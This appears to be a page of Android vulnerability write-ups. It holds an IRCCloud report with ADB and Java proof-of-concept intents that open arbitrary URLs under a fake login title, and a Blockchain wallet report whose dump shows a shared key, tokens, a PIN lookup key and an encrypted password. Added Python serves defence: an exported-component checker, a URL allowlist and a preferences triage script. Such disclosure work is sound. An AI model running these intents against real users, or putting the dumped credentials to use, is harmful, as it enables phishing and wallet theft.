Mobile Apps

Refs

A bug that allows opening arbitrary URLs in com.irccloud.android.activity.SAMLAuthActivity.

This activity is exported:

<activity android:name="com.irccloud.android.activity.SAMLAuthActivity" android:theme="@style/dawn" android:windowSoftInputMode="adjustResize">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
</intent-filter>
</activity>

This means it can be launched by any third-party app installed on the same device: an activity that declares an <intent-filter> is exported by default unless android:exported="false" is set. On newer Android versions it could also be reached by an Android Instant App launched directly from a web browser.
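A check for the exported-by-default rule above, added here as example code for this page (it is not IRCCloud's code or the reporter's). It applies Android's pre-12 rule to a decoded AndroidManifest.xml (the kind apktool produces) and lists exported components, marking those that are exported only because of the implicit default. The manifest below is constructed around the SAMLAuthActivity declaration quoted above; the other three activities and the package name are invented.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest: the first activity copies the declaration quoted above,
# the other three are invented to exercise the remaining cases.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">
  <application>
    <activity android:name="com.irccloud.android.activity.SAMLAuthActivity"
              android:theme="@style/dawn" android:windowSoftInputMode="adjustResize">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
      </intent-filter>
    </activity>
    <activity android:name=".InternalActivity"/>
    <activity android:name=".ExplicitActivity" android:exported="true"/>
    <activity android:name=".SafeAuthActivity" android:exported="false">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

# activity, activity-alias, service and receiver share the same default;
# <provider> has its own minSdk-dependent rule and is deliberately left out.
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver")


def android_attr(elem, name):
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component):
    """Pre-Android-12 default: exported when android:exported="true", or when the
    attribute is absent and the component declares at least one <intent-filter>."""
    explicit = android_attr(component, "exported")
    if explicit is not None:
        return explicit.strip().lower() == "true"
    return component.find("intent-filter") is not None


def exported_components(manifest_xml):
    """List exported components in document order; 'implicit' marks those that are
    exported only because of the intent-filter default."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for tag in COMPONENT_TAGS:
        for comp in root.iter(tag):
            if is_exported(comp):
                findings.append({
                    "tag": tag,
                    "name": android_attr(comp, "name"),
                    "implicit": android_attr(comp, "exported") is None,
                })
    return findings


def missing_explicit_exported(manifest_xml):
    """Components with an <intent-filter> but no android:exported attribute. Since
    Android 12 (targetSdk 31) such a manifest is rejected at install time."""
    root = ET.fromstring(manifest_xml)
    return [android_attr(c, "name")
            for tag in COMPONENT_TAGS for c in root.iter(tag)
            if c.find("intent-filter") is not None and android_attr(c, "exported") is None]


if __name__ == "__main__":
    for f in exported_components(SAMPLE_MANIFEST):
        flag = "(exported by default)" if f["implicit"] else ""
        print("%-15s %-50s %s" % (f["tag"], f["name"], flag))
```

Run against a decoded manifest, the first list is the attack surface reachable from other apps; the second is what has to be fixed anyway before targeting Android 12, which is a convenient moment to decide whether each component should be exported at all.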

In the activity's source we can see that it loads an attacker-provided URL taken straight from the Intent:

if (getIntent() == null || !getIntent().hasExtra("auth_url")) {
    finish();
    return;
}
// Both the title and the URL come verbatim from the incoming Intent; neither is validated.
getSupportActionBar().setTitle(getIntent().getStringExtra("title"));
this.mWebView.loadUrl(getIntent().getStringExtra("auth_url"));

PoC from ADB:

adb shell am start -n com.irccloud.android/com.irccloud.android.activity.SAMLAuthActivity -e title "ATTAAACK" -e auth_url "http://google.com/"

PoC in Java:

Intent intent = new Intent();
intent.setClassName("com.irccloud.android", "com.irccloud.android.activity.SAMLAuthActivity");
intent.putExtra("title", "ATTAAACK");
intent.putExtra("auth_url", "http://google.com/");
startActivity(intent);

Result:

This is dangerous because the user does not see the real URL. An attacker can open any page and set any title (such as "IRCCloud: Login Required") and use this to phish the user's credentials.
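What a fix should check before handing auth_url to loadUrl, added here as example code for this page (not IRCCloud's code or the reporter's). It is written in Python so it can be run stand-alone; inside the Activity the same logic would be applied with android.net.Uri before mWebView.loadUrl. The allowed hosts are assumptions, since the page does not name the service's SAML endpoints. The check also covers the usual allowlist bypasses (userinfo, scheme tricks, substring matches, odd ports).

```python
from urllib.parse import urlsplit

# Assumed allowlist: the real hosts the SAML flow may load are not given on the page.
ALLOWED_HOSTS = {"www.irccloud.com", "api.irccloud.com"}


def is_safe_auth_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Accept only https URLs whose exact host is on the allowlist."""
    if not isinstance(url, str) or not url.strip():
        return False
    parts = urlsplit(url.strip())

    # Scheme must be https. This rejects javascript:, file:, intent:, content:,
    # plain http and scheme-relative "//host/..." (empty scheme).
    if parts.scheme.lower() != "https":
        return False

    # "https://www.irccloud.com@evil.com/" parses with hostname evil.com; refuse any
    # userinfo outright rather than relying on the parser getting it right.
    if "@" in parts.netloc:
        return False

    # hostname is lowercased with port and brackets stripped; an invalid port
    # ("https://host:x/") raises ValueError, which also counts as unsafe.
    host = parts.hostname
    try:
        port = parts.port
    except ValueError:
        return False
    if host is None or port not in (None, 443):
        return False

    # Exact match against the allowlist: no prefix/suffix/substring matching, so
    # "https://evil.com/www.irccloud.com" and "www.irccloud.com.evil.com" both fail.
    return host in allowed_hosts


if __name__ == "__main__":
    for candidate in [
        "https://www.irccloud.com/saml/start?x=1",
        "http://www.irccloud.com/",
        "https://www.irccloud.com@evil.com/",
        "https://evil.com/www.irccloud.com",
        "javascript:alert(1)",
        "//www.irccloud.com/",
    ]:
        print("%-45s %s" % (candidate, "ALLOW" if is_safe_auth_url(candidate) else "BLOCK"))
```

Two further changes belong with the URL check: if only the app itself ever starts this activity, mark it android:exported="false" so the check is never reached by other apps, and take the action-bar title from the app's own resources rather than from the Intent, so a caller cannot dress an arbitrary page up as a login prompt.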

Jan 17th, 2019

Game: Cat Runner (Android)

Sep 14th, 2018

Company: blockchain.com

Summary

If the wallet owner loses their device, their credentials are exposed. An attacker can easily obtain credentials such as the password and other wallet information.

Vulnerability details

Sensitive data is stored in the shared_prefs folder, including pin_key, the encrypted password and other information about the user's wallet. The encrypted password is crackable because Stack Protection is not enabled, which opens up the opportunity for an attacker to reverse the code and find out which hash function is being used.

Proof of concept

  1. Installed the Blockchain wallet app on BlueStacks

  2. Logged in with an authenticated account

  3. Used adb to connect to the device from a terminal

  4. The user's credentials are stored in /data/data/piuk.blockchain.android/shared_prefs/piuk.blockchain.android_preferences.xml

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<boolean name="logged_out" value="false" />
<string name="sharedKey">6cce3c75-6945-442e-827f-d47e0ee894e8</string>
<string name="guid">ccc64d34-142b-4673-905f-57e0ad52a2fb</string>
<string name="firebase_token">dFjqwI8-GPo:APA91bGPmOdbhELsOllxsfFTIlLwrHvKwjBsXYGat-8ZRxuSBA21qKdPzylJPBGK_2-P6B-eDx8bx_9hcnDl5cMQ77vnKlz34IpLAEJ86j-CuQb5LLdNGEgIjwnm0q8NbNpMorPqRv1w</string>
<boolean name="swipe_to_receive_enabled" value="true" />
<string name="KEY_CURRENCY_CRYPTO_STATE">BTC</string>
<boolean name="push_notification_enabled" value="true" />
<boolean name="push_notifications" value="true" />
<boolean name="screenshots_enabled" value="false" />
<int name="app_visits" value="3" />
<string name="LAST_KNOWN_BTC_VALUE_FOR_CURRENCY_EUR">5389.02</string>
<boolean name="newly_created_wallet" value="false" />
<string name="LAST_KNOWN_ETH_VALUE_FOR_CURRENCY_EUR">148.31</string>
<string name="swipe_receive_bch_addresses">1LE3zuwjD216DyE7GKFL22SQtmXdKYKs8R,1HcvXMu91nAsvSHzjAfqxhNxhK2pYFYbsY,14cG3xJ7c482ymwtDa2Qzn1WNDp7VrZSZs,1NKu3MhxtQ9jovYPR9iXyA8QUrPVFAPZ7T,1EutsGyW4v1fJreP6XbzqJ8vgMRHSdBkjy,</string>
<string name="LAST_KNOWN_ETH_VALUE_FOR_CURRENCY_USD">173.1</string>
<boolean name="fingerprint" value="false" />
<boolean name="2fa" value="false" />
<boolean name="email_notifications" value="false" />
<boolean name="code_verified" value="true" />
<string name="swipe_receive_bch_account_name">My Bitcoin Cash Wallet</string>
<boolean name="tor" value="false" />
<string name="pin_kookup_key">43948b874026629327952f69d49ea0bb</string>
<string name="swipe_receive_account_name">My Bitcoin Wallet</string>
<long name="security_time_elapsed" value="1536740039696" />
<string name="encrypted_password">26sMpt7MYTI0ItT6wqG+N1grvxgEo8EXJysoBg/nEeQ=</string>
<string name="LAST_KNOWN_BCH_VALUE_FOR_CURRENCY_USD">419.69</string>
<boolean name="receive_shortcuts_enabled" value="true" />
<string name="swipe_receive_addresses">1LE3zuwjD216DyE7GKFL22SQtmXdKYKs8R,1HcvXMu91nAsvSHzjAfqxhNxhK2pYFYbsY,14cG3xJ7c482ymwtDa2Qzn1WNDp7VrZSZs,1NKu3MhxtQ9jovYPR9iXyA8QUrPVFAPZ7T,1EutsGyW4v1fJreP6XbzqJ8vgMRHSdBkjy,</string>
<string name="LAST_KNOWN_BTC_VALUE_FOR_CURRENCY_USD">6257.9</string>
<boolean name="fingerprint_enabled" value="false" />
<int name="pin_fails" value="0" />
<string name="swipe_receive_eth_address">0x768fd021f8eb3327b58fe0bbd114fac392256eeb</string>
<string name="ccurrency">USD</string>
</map>

  5. Obtained the user's encrypted password and pin_key

  6. Stack Protection is not enabled, so started reversing the code to find out which hash function is being used to encrypt the password. For the password, the encryption function resides in public final class DoubleEncryptionFactory
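A triage pass over a dump like the one above, added here as example code for this page (not the reporter's or Blockchain's). It parses a SharedPreferences XML file, flags entries by key name and by value shape (UUID, hex, base64) and reports the decoded size of ciphertext-looking values, which is the first thing to know before reversing the encryption routine. The embedded file is a constructed subset of the dump above; the pin_kookup_key and encrypted_password values are copied as shown, the rest are shortened.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed subset of the shared_prefs dump above.
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<boolean name="logged_out" value="false" />
<string name="sharedKey">6cce3c75-6945-442e-827f-d47e0ee894e8</string>
<string name="guid">ccc64d34-142b-4673-905f-57e0ad52a2fb</string>
<string name="KEY_CURRENCY_CRYPTO_STATE">BTC</string>
<string name="pin_kookup_key">43948b874026629327952f69d49ea0bb</string>
<string name="encrypted_password">26sMpt7MYTI0ItT6wqG+N1grvxgEo8EXJysoBg/nEeQ=</string>
<int name="pin_fails" value="0" />
<string name="ccurrency">USD</string>
</map>
"""

# Key-name words that usually mark a secret or an account identifier.
SENSITIVE_NAME_RE = re.compile(r"pass|pin|secret|token|guid|session|cred|sharedkey", re.I)
UUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
HEX_RE = re.compile(r"^[0-9a-f]{32,}$", re.I)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def parse_prefs(xml_text):
    """Return {name: value} for a SharedPreferences file. <string> carries its value
    as element text; boolean/int/long/float carry it in the value attribute."""
    entries = {}
    for child in ET.fromstring(xml_text):
        name = child.get("name")
        entries[name] = (child.text or "") if child.tag == "string" else child.get("value")
    return entries


def classify_value(value):
    """Guess the shape of a value. Order matters: a UUID contains hex, and a
    32-char hex string is also valid base64."""
    if UUID_RE.match(value):
        return "uuid"
    if HEX_RE.match(value):
        return "hex"
    if B64_RE.match(value) and len(value) % 4 == 0:
        return "base64"
    return "plain"


def triage_prefs(xml_text):
    """Flag entries whose key looks sensitive or whose value looks like an identifier,
    a hash or ciphertext; attach the decoded byte length where it can be computed."""
    findings = []
    for name, value in parse_prefs(xml_text).items():
        if value is None:
            continue
        shape = classify_value(value)
        by_name = bool(SENSITIVE_NAME_RE.search(name))
        if not by_name and shape == "plain":
            continue
        finding = {"key": name, "shape": shape, "by_name": by_name}
        if shape == "base64":
            finding["decoded_len"] = len(base64.b64decode(value))
        elif shape == "hex":
            finding["decoded_len"] = len(value) // 2
        findings.append(finding)
    return findings


def findings_by_key(xml_text):
    return {f["key"]: f for f in triage_prefs(xml_text)}


if __name__ == "__main__":
    for f in triage_prefs(SAMPLE_PREFS):
        print("%-28s %-7s %s" % (f["key"], f["shape"], f.get("decoded_len", "")))
```

Two caveats a practitioner would add. On a non-rooted device the shared_prefs directory is readable only by the app's own UID, so this scenario presumes a rooted device, an emulator such as BlueStacks, or an extractable backup. And the 32-byte ciphertext in encrypted_password is only as protected as the key material used to produce it: anything derivable from other values in the same file or from decompiled code (the PIN lookup key, a reversible DoubleEncryptionFactory) is recoverable from the dump, which is why the usual fix is not to persist the password at all, or to wrap any stored secret with a key held in the Android Keystore (for example via EncryptedSharedPreferences).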

Impact

An attacker might be able to steal the encrypted password and later decrypt it.